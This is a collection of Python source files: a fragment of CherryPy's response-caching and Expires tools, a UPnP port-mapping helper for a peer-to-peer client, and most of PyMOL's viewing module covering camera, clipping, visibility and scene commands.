request.cached = bool(cache_data)
request.cacheable = not request.cached
if request.cached:
# Serve the cached copy.
max_age = cherrypy._cache.delay
for v in [e.value for e in request.headers.elements('Cache-Control')]:
atoms = v.split('=', 1)
directive = atoms.pop(0)
if directive == 'max-age':
if len(atoms) != 1 or not atoms[0].isdigit():
raise cherrypy.HTTPError(400, "Invalid Cache-Control header")
max_age = int(atoms[0])
break
elif directive == 'no-cache':
if debug:
cherrypy.log('Ignoring cache due to Cache-Control: no-cache',
'TOOLS.CACHING')
request.cached = False
request.cacheable = True
return False
if debug:
cherrypy.log('Reading response from cache', 'TOOLS.CACHING')
s, h, b, create_time = cache_data
age = int(response.time - create_time)
if (age > max_age):
if debug:
cherrypy.log('Ignoring cache due to age > %d' % max_age,
'TOOLS.CACHING')
request.cached = False
request.cacheable = True
return False
# Copy the response headers. See http://www.cherrypy.org/ticket/721.
response.headers = rh = httputil.HeaderMap()
for k in h:
dict.__setitem__(rh, k, dict.__getitem__(h, k))
# Add the required Age header
response.headers["Age"] = str(age)
try:
# Note that validate_since depends on a Last-Modified header;
# this was put into the cached copy, and should have been
# resurrected just above (response.headers = cache_data[1]).
cptools.validate_since()
except cherrypy.HTTPRedirect, x:
if x.status == 304:
cherrypy._cache.tot_non_modified += 1
raise
# serve it & get out from the request
response.status = s
response.body = b
else:
if debug:
cherrypy.log('request is not cached', 'TOOLS.CACHING')
return request.cached
def tee_output():
request = cherrypy.serving.request
if 'no-store' in request.headers.values('Cache-Control'):
return
def tee(body):
"""Tee response.body into a list."""
if ('no-cache' in response.headers.values('Pragma') or
'no-store' in response.headers.values('Cache-Control')):
for chunk in body:
yield chunk
return
output = []
for chunk in body:
output.append(chunk)
yield chunk
# save the cache data
body = ''.join(output)
cherrypy._cache.put((response.status, response.headers or {},
body, response.time), len(body))
response = cherrypy.serving.response
response.body = tee(response.body)
def expires(secs=0, force=False, debug=False):
"""Tool for influencing cache mechanisms using the 'Expires' header.
'secs' must be either an int or a datetime.timedelta, and indicates the
number of seconds between response.time and when the response should
expire. The 'Expires' header will be set to (response.time + secs).
If 'secs' is zero, the 'Expires' header is set one year in the past, and
the following "cache prevention" headers are also set:
'Pragma': 'no-cache'
'Cache-Control': 'no-cache, must-revalidate'
If 'force' is False (the default), the following headers are checked:
'Etag', 'Last-Modified', 'Age', 'Expires'. If any are already present,
none of the above response headers are set.
"""
response = cherrypy.serving.response
headers = response.headers
cacheable = False
if not force:
# some header names that indicate that the response can be cached
for indicator in ('Etag', 'Last-Modified', 'Age', 'Expires'):
if indicator in headers:
cacheable = True
break
if not cacheable and not force:
if debug:
cherrypy.log('request is not cacheable', 'TOOLS.EXPIRES')
else:
if debug:
cherrypy.log('request is cacheable', 'TOOLS.EXPIRES')
if isinstance(secs, datetime.timedelta):
secs = (86400 * secs.days) + secs.seconds
if secs == 0:
if force or ("Pragma" not in headers):
headers["Pragma"] = "no-cache"
if cherrypy.serving.request.protocol >= (1, 1):
if force or "Cache-Control" not in headers:
headers["Cache-Control"] = "no-cache, must-revalidate"
# Set an explicit Expires date in the past.
expiry = httputil.HTTPDate(1169942400.0)
else:
expiry = httputil.HTTPDate(response.time + secs)
if force or "Expires" not in headers:
headers["Expires"] = expiry
|
upnp.py
|
import logging
import threading
from queue import Queue
from typing import Optional
try:
import miniupnpc
except ImportError:
pass
log = logging.getLogger(__name__)
class UPnP:
thread: Optional[threading.Thread] = None
queue: Queue = Queue()
def __init__(self):
def run():
try:
self.upnp = miniupnpc.UPnP()
self.upnp.discoverdelay = 30
self.upnp.discover()
self.upnp.selectigd()
keep_going = True
while keep_going:
msg = self.queue.get()
if msg[0] == "remap":
port = msg[1]
log.info(f"Attempting to enable UPnP (open up port {port})")
try:
self.upnp.deleteportmapping(port, "TCP")
except Exception as e:
log.info(f"Removal of previous portmapping failed. This does not indicate an error: {e}")
self.upnp.addportmapping(port, "TCP", self.upnp.lanaddr, port, "dogia", "")
log.info(
f"Port {port} opened with UPnP. lanaddr {self.upnp.lanaddr} "
f"external: {self.upnp.externalipaddress()}"
)
elif msg[0] == "release":
port = msg[1]
log.info(f"UPnP, releasing port {port}")
self.upnp.deleteportmapping(port, "TCP")
log.info(f"UPnP, Port {port} closed")
elif msg[0] == "shutdown":
keep_going = False
except Exception as e:
log.info(
"UPnP failed. This is not required to run dogia, it allows incoming connections from other peers."
)
log.info(e)
self.thread = threading.Thread(target=run)
self.thread.start()
def remap(self, port):
self.queue.put(("remap", port))
def release(self, port):
self.queue.put(("release", port))
def shutdown(self):
if not self.thread:
return
self.queue.put(("shutdown",))
log.info("UPnP, shutting down thread")
self.thread.join()
self.thread = None
# this is here just in case the UPnP object is destroyed non-gracefully,
# e.g. via an exception before the main thread can call shutdown()
def __del__(self):
self.shutdown()
|
viewing.py
|
#A* -------------------------------------------------------------------
#B* This file contains source code for the PyMOL computer program
#C* Copyright (c) Schrodinger, LLC.
#D* -------------------------------------------------------------------
#E* It is unlawful to modify or remove this copyright notice.
#F* -------------------------------------------------------------------
#G* Please see the accompanying LICENSE file for further information.
#H* -------------------------------------------------------------------
#I* Additional authors of this source file include:
#-* Filipe Maia (slicing code)
#-*
#-*
#Z* -------------------------------------------------------------------
from . import colorprinting
if True:
import sys
import threading
import pymol
from . import selector
import copy
from . import parsing
import re
cmd = sys.modules["pymol.cmd"]
from .cmd import _cmd, Shortcut, \
_feedback,fb_module,fb_mask, \
repres,repres_sc, is_string, is_list, \
repmasks,repmasks_sc, \
toggle_dict,toggle_sc,stereo_dict,stereo_sc, \
palette_dict, palette_sc, window_dict, window_sc, \
safe_list_eval, safe_alpha_list_eval, \
location_code, location_sc, boolean_dict, boolean_sc, \
DEFAULT_ERROR, DEFAULT_SUCCESS
palette_colors_dict = {
'rainbow_cycle' : 'magenta blue cyan green yellow orange red magenta',
'rainbow_cycle_rev' : 'magenta red orange yellow green cyan blue magenta',
'rainbow' : 'blue cyan green yellow orange red',
'rainbow_rev' : 'red orange yellow green cyan blue',
'rainbow2' : 'blue cyan green yellow orange red',
'rainbow2_rev' : 'red orange yellow green cyan blue',
'gcbmry' : 'green cyan blue magenta red yellow',
'yrmbcg' : 'yellow red magenta blue cyan green',
'cbmr' : 'cyan blue magenta red',
'rmbc' : 'red magenta blue cyan',
}
rep_list = [ "lines", "sticks", "spheres", "dots", "surface",
"mesh", "nonbonded", "nb_spheres", "cartoon",
"ribbon", "labels", "slice", "ellipsoids", "volume" ]
scene_action_sc = Shortcut(['store','recall','clear','insert_before',
'insert_after','next','previous',
'start', 'update','rename','delete',
'order', 'sort', 'first',
'append'])
scene_action_dict = {}
scene_action_dict_sc = Shortcut([])
view_sc = Shortcut(['store','recall','clear'])
def zoom(selection="all", buffer=0.0, state=0, complete=0, animate=0, *, _self=cmd):
'''
DESCRIPTION
"zoom" scales and translates the window and the origin to cover the
atom selection.
USAGE
zoom [ selection [, buffer [, state [, complete [, animate ]]]]]
EXAMPLES
zoom
zoom complete=1
zoom 142/, animate=3
zoom (chain A)
ARGUMENTS
selection = string: selection-expression or name pattern {default: all}
buffer = float: distance {default: 0}
state = 0: uses all coordinate states {default}
state = -1: uses only coordinates for the current state
state > 0: uses coordinates for a specific state
complete = 0 or 1: will insure no atoms centers are clipped
animate < 0: uses the default animation duration
animate = 0: no animation
animate > 0: animates using the provided duration in seconds
PYMOL API
cmd.zoom(string selection, float buffer, int state, int complete,
int animate)
NOTES
The zoom command normally tries to guess an optimal zoom level for
visualization, balancing closeness against occasional clipping of
atoms out of the field of view. You can change this behavior by
setting the complete option to 1, which will guarantee that the
atom positions for the entire selection will fit in the field of
an orthoscopic view.
To absolutely prevent clipping, you may also need to add an
additional buffer (typically 2 A) to account for graphical
representations which extend beyond the atom coordinates.
SEE ALSO
origin, orient, center
'''
# preprocess selection
selection = selector.process(selection)
#
with _self.lockcm:
r = _cmd.zoom(_self._COb,str(selection),float(buffer),
int(state)-1,int(complete),float(animate))
return r
def center(selection="all", state=0, origin=1, animate=0, *, _self=cmd):
'''
DESCRIPTION
"center" translates the window, the clipping slab, and the
origin to a point centered within the atom selection.
USAGE
center [ selection [, state [, origin [, animate ]]]]
EXAMPLES
center chain B
center 145/
ARGUMENTS
selection = string: selection-expression or name pattern (default: "all").
state = 0 (default) use all coordinate states
state = -1 use only coordinates for the current state
state > 0 use coordinates for a specific state
origin = 1 (default) move the origin
origin = 0 leave the origin unchanged
PYMOL API
cmd.center(string selection, int state, int origin)
SEE ALSO
origin, orient, zoom
'''
# preprocess selection
selection = selector.process(selection)
#
with _self.lockcm:
r = _cmd.center(_self._COb,str(selection),int(state)-1,int(origin),float(animate))
return r
clip_action_sc = Shortcut([ 'near','far','move','slab','atoms' ])
def clip(mode, distance, selection=None, state=0, *, _self=cmd):
'''
DESCRIPTION
"clip" alters the positions of the clipping planes.
USAGE
clip mode, distance [, selection [, state ]]
ARGUMENTS
mode = near, far, move, slab, or atoms
distance is a floating point value
selection = atom selection (for mode=atoms only)
EXAMPLES
clip near, -5 # moves near plane away from you by 5 A
clip far, 10 # moves far plane towards you by 10 A
clip move, -5 # moves the slab away from you by 5 A
clip slab, 20 # sets slab thickness to 20 A
clip slab, 10, resi 11 # clip 10 A slab about residue 11
clip atoms, 5, pept # clip atoms in "pept" with a 5 A buffer
# about their current camera positions
PYMOL API
cmd.clip(string mode, float distance, string selection, int state)
SEE ALSO
zoom, orient, reset
'''
mode = clip_action_sc.auto_err(str(mode),'mode')
if selection is not None:
selection = selector.process(selection)
else:
selection = ''
with _self.lockcm:
r = _cmd.clip(_self._COb,str(mode),float(distance),
str(selection),int(state)-1)
return r
def origin(selection="(all)", object=None, position=None, state=0, *, _self=cmd):
'''
DESCRIPTION
"origin" sets the center of rotation about a selection. If an
object name is specified, it can be used to set the center of
rotation for the object (for use in animation and editing).
USAGE
origin [ selection [, object [,position, [, state ]]]]
ARGUMENTS
selection = string: selection-expression or name-list {default: (all)}
state = 0 (default) use all coordinate states
state = -1 use only coordinates for the current state
state > 0 use coordinates for a specific state
EXAMPLES
origin chain A
origin position=[1.0,2.0,3.0]
PYMOL API
cmd.origin(string object-or-selection)
SEE ALSO
zoom, orient, reset
'''
#'
# preprocess selection
selection = selector.process(selection)
#
with _self.lockcm:
if object is None: object=''
if position is None: position=(0.0,0.0,0.0)
else:
if _self.is_string(position):
position = safe_list_eval(position)
selection = ''
r = _cmd.origin(_self._COb,selection,str(object),
(float(position[0]),
float(position[1]),
float(position[2])
),int(state)-1)
return r
def orient(selection="(all)", state=0, animate=0, *, _self=cmd):
'''
DESCRIPTION
"orient" aligns the principal components of the atoms in the
selection with the XYZ axes.
USAGE
orient [ selection [, state [, animate ]]]
ARGUMENTS
selection = a selection-expression or name-pattern {default: (all)}
state = 0: use all coordinate states {default}
state = -1: uses only coordinates for the current state
state > 0: uses coordinates for a specific state
EXAMPLES
orient organic
NOTES
The function is similar to the orient command in X-PLOR.
PYMOL API
cmd.orient(string object-or-selection, int state, float animate)
SEE ALSO
zoom, origin, reset
'''
# preprocess selection
selection = selector.process(selection)
with _self.lockcm:
return _cmd.orient(_self._COb,"("+selection+")",int(state)-1,float(animate))
def move(axis, distance, *, _self=cmd):
'''
DESCRIPTION
"move" translates the camera about one of the three primary axes.
USAGE
move axis, distance
EXAMPLES
move x, 3
move y, -1
PYMOL API
cmd.move(string axis, float distance)
SEE ALSO
turn, rotate, translate, zoom, center, clip
'''
with _self.lockcm:
return _cmd.move(_self._COb,str(axis),float(distance))
def enable(name='all', parents=0, *, _self=cmd):
'''
DESCRIPTION
"enable" turns on display of one or more objects and/or selections.
USAGE
enable name
ARGUMENTS
name = name-pattern or selection.
NOTES
If name matches a selection name, then selection indicator dots
are shown for atoms in that selection. If name is a
selection-expression, then all objects with atoms in that
selection are enabled.
For an object\'s content to be displayed in the 3D viewer, the
object must be enabled AND at least one of the available
representations must be shown.
PYMOL API
cmd.enable(string object-name)
EXAMPLES
enable target_protein # enables the target_protein object
enable 1dn2.* # enables all entities starting with 1dn2.
enable *lig # enables all entities ending with lig
SEE ALSO
show, hide, disable
'''
if name[0]=='(':
selection = selector.process(name)
with _self.lockcm:
r = _cmd.onoff_by_sele(_self._COb,selection,1)
else:
with _self.lockcm:
r = _cmd.onoff(_self._COb,str(name),1,int(parents));
return r
def disable(name='all', *, _self=cmd):
'''
DESCRIPTION
"disable" turns off display of one or more objects and/or selections.
USAGE
disable name
ARGUMENTS
name = name-pattern or selection.
PYMOL API
cmd.disable(string name)
SEE ALSO
show, hide, enable
'''
if name[0]=='(':
selection = selector.process(name)
with _self.lockcm:
r = _cmd.onoff_by_sele(_self._COb,selection,0)
else:
with _self.lockcm:
r = _cmd.onoff(_self._COb,str(name),0,0);
return r
def _rep_to_repmask(rep):
repn = 0
for rep in rep.split():
rep = repmasks_sc.auto_err(rep, 'representation')
repn |= repmasks[rep]
return repn
def toggle(representation="lines", selection="all", *, _self=cmd):
'''
DESCRIPTION
"toggle" toggles the visibility of a representation within a
selection.
USAGE
toggle [ representation [, selection ]]
ARGUMENTS
representation = string: named representation {default: lines}
selection = string: atom selection {default: all}
NOTES
If the representation is enabled for any atom in the selection, it will
be turned off.
PYMOL API
cmd.toggle(string representation, string selection)
SEE ALSO
show, hide
'''
with _self.lockcm:
if representation == 'object':
repn = -2
else:
repn = _rep_to_repmask(representation)
# preprocess selection
selection = selector.process(selection)
r = _cmd.toggle(_self._COb,str(selection),int(repn));
return r
def _showhide(rep, selection, value, _self):
if not selection and (rep in ("", "all") or '(' in rep or '/' in rep):
# rep looks like a selection
selection = rep
rep = "wire" if value else "everything"
selection = selector.process(selection) or "all"
repn = _rep_to_repmask(rep)
with _self.lockcm:
r = _cmd.showhide(_self._COb, str(selection), int(repn), value)
return r
def show(representation="wire", selection="", *, _self=cmd):
'''
DESCRIPTION
"show" turns on representations for objects and selections.
USAGE
show [ representation [, selection ]]
ARGUMENTS
representation = lines, spheres, mesh, ribbon, cartoon, sticks,
dots, surface, labels, extent, nonbonded, nb_spheres, slice,
extent, slice, dashes, angles, dihedrals, cgo, cell, callback,
or everything
selection = string: a selection-expression or name-pattern
NOTES
With no arguments, "show" alone turns on lines for all bonds and
nonbonded for all atoms in all molecular objects.
EXAMPLES
show
show ribbon
show lines, (name CA+C+N)
SEE ALSO
hide, enable, disable
'''
return _showhide(representation, selection, 1, _self)
def show_as(representation="wire", selection="", *, _self=cmd):
'''
DESCRIPTION
"as" turns on and off atom and bond representations.
USAGE
as representation [, selection ]
ARGUMENTS
representation = lines, spheres, mesh, ribbon, cartoon, sticks,
dots, surface, labels, extent, nonbonded, nb_spheres, slice,
extent, slice, dashes, angles, dihedrals, cgo, cell, callback,
volume or everything
selection = string {default: all}
EXAMPLES
as lines, name CA+C+N
as ribbon
PYMOL API
cmd.show_as(string representation, string selection)
NOTES
"selection" can be an object name
"as" alone will turn on lines and nonbonded and hide everything else.
SEE ALSO
show, hide, enable, disable
'''
return _showhide(representation, selection, 2, _self)
def hide(representation="everything", selection="", *, _self=cmd):
'''
DESCRIPTION
"hide" turns off atom and bond representations.
USAGE
hide [ representation [, selection ]]
ARGUMENTS
representation = lines, spheres, mesh, ribbon, cartoon,
sticks, dots, surface, labels, extent, nonbonded, nb_spheres,
slice, extent, slice, dashes, angles, dihedrals, cgo, cell, callback,
or everything
selection = string: a selection-expression or name-pattern
EXAMPLES
hide lines, all
hide ribbon
PYMOL API
cmd.hide(string representation, string selection)
SEE ALSO
show, enable, disable
'''
return _showhide(representation, selection, 0, _self)
def get_view(output=1, quiet=1, *, _self=cmd):
'''
DESCRIPTION
"get_view" returns and optionally prints out the current view
information in a format which can be embedded into a command
script and can be used in subsequent calls to "set_view".
If a log file is currently open, get_view will not write the view
matrix to the screen unless the "output" parameter is 2.
USAGE
get_view [output]
ARGUMENTS
output = 0: output matrix to screen
output = 1: do not Output matrix to screen
output = 2: force output to screen even if log file is open
output = 3: return formatted string instead of a list
NOTES
Contents of the view matrix:
* 0 - 8: column-major 3x3 matrix which rotates model space to camera space
* 9 - 11: origin of rotation relative to camera (in camera space)
* 12 - 14: origin of rotation (in model space)
* 15: front plane distance from the camera
* 16: rear plane distance from the camera
* 17: orthoscopic flag (+/-) and field of view (if abs(value) > 1)
The camera always looks down -Z with its +X left and its +Y down.
Therefore, in the default view, model +X is to the observer\'s
right, +Y is upward, and +Z points toward the observer.
PYMOL API
cmd.get_view(output=1, quiet=1)
SEE ALSO
set_view
'''
with _self.lockcm:
r = _cmd.get_view(_self._COb)
if True:
output = int(output)
if True:
if (_self.get_setting_int("logging") != 0) and (output<3):
if not quiet:
print(" get_view: matrix written to log file.")
_self.log("_ set_view (\\\n","cmd.set_view((\\\n")
_self.log("_ %14.9f, %14.9f, %14.9f,\\\n"%r[0:3] ,
" %14.9f, %14.9f, %14.9f,\\\n"%r[0:3])
_self.log("_ %14.9f, %14.9f, %14.9f,\\\n"%r[4:7] ,
" %14.9f, %14.9f, %14.9f,\\\n"%r[4:7])
_self.log("_ %14.9f, %14.9f, %14.9f,\\\n"%r[8:11] ,
" %14.9f, %14.9f, %14.9f,\\\n"%r[8:11])
_self.log("_ %14.9f, %14.9f, %14.9f,\\\n"%r[16:19],
" %14.9f, %14.9f, %14.9f,\\\n"%r[16:19])
_self.log("_ %14.9f, %14.9f, %14.9f,\\\n"%r[19:22],
" %14.9f, %14.9f, %14.9f,\\\n"%r[19:22])
_self.log("_ %14.9f, %14.9f, %14.9f )\n"%r[22:25] ,
" %14.9f, %14.9f, %14.9f ))\n"%r[22:25])
if output<2: # suppress if we have a log file open
output=0
if output and (not quiet) and (output<3):
print("### cut below here and paste into script ###")
print("set_view (\\")
print(" %14.9f, %14.9f, %14.9f,\\"%r[0:3])
print(" %14.9f, %14.9f, %14.9f,\\"%r[4:7])
print(" %14.9f, %14.9f, %14.9f,\\"%r[8:11])
print(" %14.9f, %14.9f, %14.9f,\\"%r[16:19])
print(" %14.9f, %14.9f, %14.9f,\\"%r[19:22])
print(" %14.9f, %14.9f, %14.9f )"%r[22:25])
print("### cut above here and paste into script ###")
if output==3:
return ("set_view (\\\n"+
" %14.9f, %14.9f, %14.9f,\\\n"%r[0:3] +
" %14.9f, %14.9f, %14.9f,\\\n"%r[4:7] +
" %14.9f, %14.9f, %14.9f,\\\n"%r[8:11] +
" %14.9f, %14.9f, %14.9f,\\\n"%r[16:19] +
" %14.9f, %14.9f, %14.9f,\\\n"%r[19:22] +
" %14.9f, %14.9f, %14.9f )\n"%r[22:25])
r = r[0:3]+r[4:7]+r[8:11]+r[16:25]
return r
def set_view(view,animate=0,quiet=1,hand=1, *, _self=cmd):
r'''
DESCRIPTION
"set_view" sets viewing information for the current scene,
including the rotation matrix, position, origin of rotation,
clipping planes, and the orthoscopic flag.
USAGE
set_view [ view ]
EXAMPLE
set_view (\
0.999876618, -0.000452542, -0.015699286,\
0.000446742, 0.999999821, -0.000372844,\
0.015699454, 0.000365782, 0.999876678,\
0.000000000, 0.000000000, -150.258514404,\
11.842411041, 20.648729324, 8.775371552,\
118.464958191, 182.052062988, 0.000000000 )
PYMOL API
cmd.set_view(string-or-sequence view)
SEE ALSO
get_view
'''
if isinstance(view, (str, bytes)):
view = safe_list_eval(view)
if len(view)!=18:
raise pymol.CmdException(
"bad view argument; should be a sequence of 18 floats")
with _self.lockcm:
r = _cmd.set_view(_self._COb,(
float(view[ 0]),float(view[ 1]),float(view[ 2]),0.0,
float(view[ 3]),float(view[ 4]),float(view[ 5]),0.0,
float(view[ 6]),float(view[ 7]),float(view[ 8]),0.0,
0.0,0.0,0.0,1.0,
float(view[ 9]),float(view[10]),float(view[11]),
float(view[12]),float(view[13]),float(view[14]),
float(view[15]),float(view[16]),float(view[17])),
int(quiet),float(animate),int(hand))
return r
def view(key, action='recall', animate=-1, *, _self=cmd):
'''
DESCRIPTION
"view" saves and restore camera views.
USAGE
view key [, action [, animate]]
ARGUMENTS
key = string or *
action = store, recall, clear: {default: recall}
NOTES
Views F1 through F12 are automatically bound to function keys
provided that "set_key" has not been used to redefine the
behaviour of the respective key, and that a "scene" has not been
defined for that key.
EXAMPLES
view 0, store
view 0
PYMOL API
cmd.view(string key, string action)
SEE ALSO
scene, set_view, get_view
'''
pymol=_self._pymol
if key=='*':
action = view_sc.auto_err(action,'action')
if action=='clear':
pymol._view_dict = {}
pymol._view_dict_sc = Shortcut(pymol._view_dict.keys())
else:
print(" view: stored views:")
lst = list(pymol._view_dict.keys())
lst.sort()
parsing.dump_str_list(lst)
else:
action = view_sc.auto_err(action,'action')
if action=='recall':
key = pymol._view_dict_sc.auto_err(key,'view')
_self.set_view(pymol._view_dict[key],animate=animate)
if _feedback(fb_module.scene,fb_mask.actions,_self): # redundant
print(" view: \"%s\" recalled."%key)
elif (action=='store') or (action=='update'):
pymol._view_dict_sc.append(key)
pymol._view_dict[key]=_self.get_view(0)
if _feedback(fb_module.scene,fb_mask.actions,_self):
print(" view: view "+action+"d as \"%s\"."%key)
elif action=='clear':
key = pymol._view_dict_sc.auto_err(key,'view')
if key in pymol._view_dict:
del pymol._view_dict[key]
pymol._view_dict_sc = Shortcut(pymol._view_dict.keys())
if _feedback(fb_module.scene,fb_mask.actions,_self): # redundant
print(" view: '%s' deleted."%key)
def get_viewport(output=1, quiet=1, *, _self=cmd):
'''
DESCRIPTION
"get_viewport" returns and optionally prints out the screen viewport size
USAGE
get_viewport [output]
ARGUMENTS
output = 0: do not print to screen
output = 1 {default}: print to screen if not logging and not quiet
output = 2: force output to screen even if log file is open
PYMOL API
cmd.get_viewport(output=1, quiet=1)
'''
output = int(output)
with _self.lockcm:
r = _cmd.get_viewport(_self._COb)
if _self.get_setting_int("logging") and output < 3:
_self.log(f"_ viewport {r[0]}, {r[1]}\n", f"cmd.viewport{r}\n")
if not quiet:
print(" get_viewport: data written to log file.")
if output < 2: # suppress if we have a log file open
output = 0
if (0 < output < 3) and not quiet:
print("### cut below here and paste into script ###")
print("viewport %4d, %4d" % r)
print("### cut above here and paste into script ###")
if output == 3:
colorprinting.warning(" Warning: get_viewport(3) is deprecated")
return "viewport ( %4d, %4d )\n" % r
return r
def get_vis(_self=cmd):
with _self.lockcm:
return _cmd.get_vis(_self._COb)
def set_vis(dict, *, _self=cmd):
with _self.lockcm:
return _cmd.set_vis(_self._COb, dict)
def get_colorection(key, *, _self=cmd):
with _self.lockcm:
return _cmd.get_colorection(_self._COb, key)
def set_colorection(dict,key, *, _self=cmd):
with _self.lockcm:
return _cmd.set_colorection(_self._COb, dict, key)
def del_colorection(dict,key, *, _self=cmd):
with _self.lockcm:
return _cmd.del_colorection(_self._COb, dict, key)
def get_scene_list(_self=cmd):
with _self.lockcm:
return _cmd.get_scene_order(_self._COb)
def chain_session(_self=cmd):
import os
# assumes locked interpreter
r = 0
session_file = str(_self.get("session_file"))
re_pat = re.compile("[0-9]+\.")
if len(session_file): # find next session file, if it exists
mo = re_pat.search(session_file)
if mo is not None:
pat = mo.group(0)
if len(pat):
file_no = int(float(pat)) + 1
new_form = r"%0"+str(len(pat)-1)+"d."
for new_num in range(file_no, file_no+11):
new_pat = new_form % new_num
new_file = re_pat.sub(new_pat, session_file)
# try both PSE and PSW
if not os.path.exists(new_file):
new_file = re.sub("\.pse$",".psw",new_file,re.I)
if not os.path.exists(new_file):
new_file = re.sub("\.psw$",".pse",new_file,re.I)
if os.path.exists(new_file):
_self.do("_ cmd.load(r'''"+new_file+"''',format='psw')")
return 1
return 0
def scene_order(names,sort=0,location='current',quiet=1, *, _self=cmd):
'''
DESCRIPTION
"scene_order" changes the ordering of scenes.
USAGE
scene_order names, sort, location
ARGUMENTS
names = string: a space-separated list of names
sort = yes or no {default: no}
location = top, current, or bottom {default: current}
EXAMPLES
scene_order *,yes
scene_order F6 F4 F3
scene_order 003 006 004, location=top
PYMOL API
cmd.scene_order(string names, string sort, string location)
SEE ALSO
scene
'''
location = location_sc.auto_err(location,'location')
if is_string(sort):
sort=boolean_dict[boolean_sc.auto_err(sort,'sort option')]
with _self.lockcm:
return _cmd.scene_order(_self._COb, names, sort, location)
def _scene_get_current_message(_self=cmd):
wiz = _self.get_wizard()
return '\n'.join(wiz.message) if (wiz is not None
and wiz.__class__.__name__ == 'Message'
and hasattr(wiz, 'from_scene')) else None
def scene_recall_message(message, *, _self=cmd):
'''
INTERNAL, DO NOT USE.
Display a scene message.
'''
wiz = _self.get_wizard()
replace_flag = (wiz is not None
and wiz.__class__.__name__ == 'Message'
and hasattr(wiz, 'from_scene'))
if message:
if is_string(message):
message = message.splitlines()
elif not is_list(message):
raise TypeError("message %s" % (type(message)))
wizard_func = _self.replace_wizard if replace_flag else _self.wizard
wizard_func("message", *message)
_self.get_wizard().from_scene = 1
elif replace_flag:
_self.wizard()
def scene(key='auto', action='recall', message=None, view=1,
color=1, active=1, rep=1, frame=1, animate=-1,
new_key=None, hand=1, quiet=1, sele="all", *, _self=cmd):
'''
DESCRIPTION
"scene" saves and restores scenes. A scene consists of the camera
view, all object activity information, all atom-wise visibilities,
all atom-wise colors, all representations, the global frame index,
and may contain a text message to display on playback.
USAGE
scene [key [,action [, message, [ new_key=new-key-value ]]]]
ARGUMENTS
key = string, new, auto, or *: use new for an automatically
numbered new scene, use auto for the current scene (if one
exists), and use * for all scenes (clear and recall actions only).
action = store, recall, insert_after, insert_before, next,
previous, update, rename, or clear: (default = recall). If
rename, then a new_key argument must be explicitly defined.
message = string: a text message to display with the scene.
new_key = string: the new name for the scene
EXAMPLES
scene *
scene F1, store
scene F2, store, Please note the critical hydrogen bond shown in yellow.
scene F1
scene F2
scene F1, rename, new_key=F5
NOTES
Scenes F1 through F12 are automatically bound to function keys
provided that "set_key" has not been used to redefine the behaviour
of the respective key.
SEE ALSO
view, set_view, get_view
'''
action = scene_action_sc.auto_err(action, 'action')
if is_list(message):
message = '\n'.join(message)
# default when called with no arguments
if key == 'auto':
if action == 'recall':
action = 'next'
# preserve message on update
if action == 'update':
if message is None:
message = _scene_get_current_message(_self)
# aliases (DEPRECATED)
if action == 'clear':
action = 'delete'
elif action == 'append' or action == 'update':
action = 'store'
# presentation auto quit
if (pymol._scene_quit_on_action == action and
action in ('next', 'previous') and
_self.get_setting_boolean("presentation") and
_self.get_setting_boolean("presentation_auto_quit") and
_self.get("scene_current_name") == ""):
if not chain_session(_self):
_self.quit()
# call C function
with _self.lockcm:
r = _cmd.scene(_self._COb, key, action, message, int(view),
int(color), int(active), int(rep), int(frame),
float(animate), new_key, int(hand), sele)
# autocomplete
if action in ('store', 'delete') or action.startswith('insert_'):
_self._pymol._scene_dict_sc.rebuild(_self.get_scene_list())
# for presentation auto quit
pymol._scene_quit_on_action = action
return r
def _legacy_scene(key='auto', action='recall', message=None, view=1,
color=1, active=1, rep=1, frame=1, animate=-1,
new_key=None, hand=1, quiet=1, *, _self=cmd):
''' FOR INTERNAL USE ONLY. Stores and deletes <=1.7.4 compatible scenes. '''
pymol=_self._pymol
view = int(view)
rep = int(rep)
color = int(color)
active = int(active)
frame = int(frame)
quiet = int(quiet)
animate = 0
with _self.lockcm:
if key=='*':
if action=='clear':
for key in pymol._scene_dict:
# free selections
scene_list = pymol._scene_dict[key]
if len(scene_list)>3:
colorection = scene_list[3]
if colorection is not None:
_self.del_colorection(colorection,key)
name = "_scene_"+key+"_*"
_self.delete(name)
else:
raise ValueError('action=' + action)
else:
if action == 'store':
if key in ('new', 'auto'):
raise ValueError('key=' + key)
if key in pymol._scene_dict:
raise RuntimeError('update not supported')
if rep:
for rep_name in rep_list:
name = "_scene_"+key+"_"+rep_name
_self.select(name,"rep "+rep_name)
if is_string(message):
if message:
if (message[0:1] in [ '"',"'"] and
message[-1:] in [ '"',"'"]):
message=message[1:-1]
else:
message = message.splitlines()
pymol._scene_dict[key] = [
_self.get_view(0) if view else None,
_self.get_vis() if active else None,
_self.get_frame() if frame else None,
_self.get_colorection(key) if color else None,
1 if rep else None,
message,
]
else:
raise ValueError('action=' + action)
def session_save_views(session, *, _self=cmd):
pymol=_self._pymol
session['view_dict']=copy.deepcopy(pymol._view_dict)
return 1
def session_restore_views(session, *, _self=cmd):
pymol=_self._pymol
if 'view_dict' in session:
pymol._view_dict=copy.deepcopy(session['view_dict'])
pymol._view_dict_sc.rebuild(list(pymol._view_dict.keys()))
return 1
def session_restore_scenes(session, *, _self=cmd):
# Restore scenes from old session files (<= 1.7.4)
if 'scene_dict' in session:
_self.scene('*', 'clear')
# save initial scene
tempname = '_initial_scene'
while tempname in session['scene_dict']:
tempname += '_'
_self.scene(tempname, 'store')
frame = 0
if _self.get_movie_playing():
_self.mstop()
frame = _self.get_frame()
for key, data in list(session['scene_dict'].items()):
_convert_legacy_scene(key, data, _self)
if frame:
_self.frame(frame)
_self.mplay()
# restore initial scene
_self.scene(tempname, 'recall', animate=0)
_self.scene(tempname, 'clear')
if 'scene_order' in session:
_self.scene_order(' '.join(session['scene_order']))
_self._pymol._scene_dict_sc.rebuild(_self.get_scene_list())
return 1
def _convert_legacy_scene(key, scene_list, _self=cmd):
# Create a scene from the given legacy scene list and finally delete
# the colorection and rep selections.
scene_list += [None] * 5
view, active, frame, color, rep = [(0 if x is None else 1)
for x in scene_list[:5]]
if frame:
_self.frame(scene_list[2])
if view:
_self.set_view(scene_list[0], 0.0)
if active:
_self.disable()
_self.deselect()
_self.set_vis(scene_list[1])
if color:
_self.set_colorection(scene_list[3], key)
_self.del_colorection(scene_list[3], key)
if rep:
# only atomic representations
_self.hide('everything', '(*)')
sele_prefix = _self.get_legal_name('_scene_' + key + '_')
for rep_name in rep_list:
_self.show(rep_name, "?" + sele_prefix + rep_name)
_self.delete(sele_prefix + "*")
_self.scene(key, 'store', scene_list[5], view, color, active, rep, frame)
def stereo(toggle='on', quiet=1, *, _self=cmd):
'''
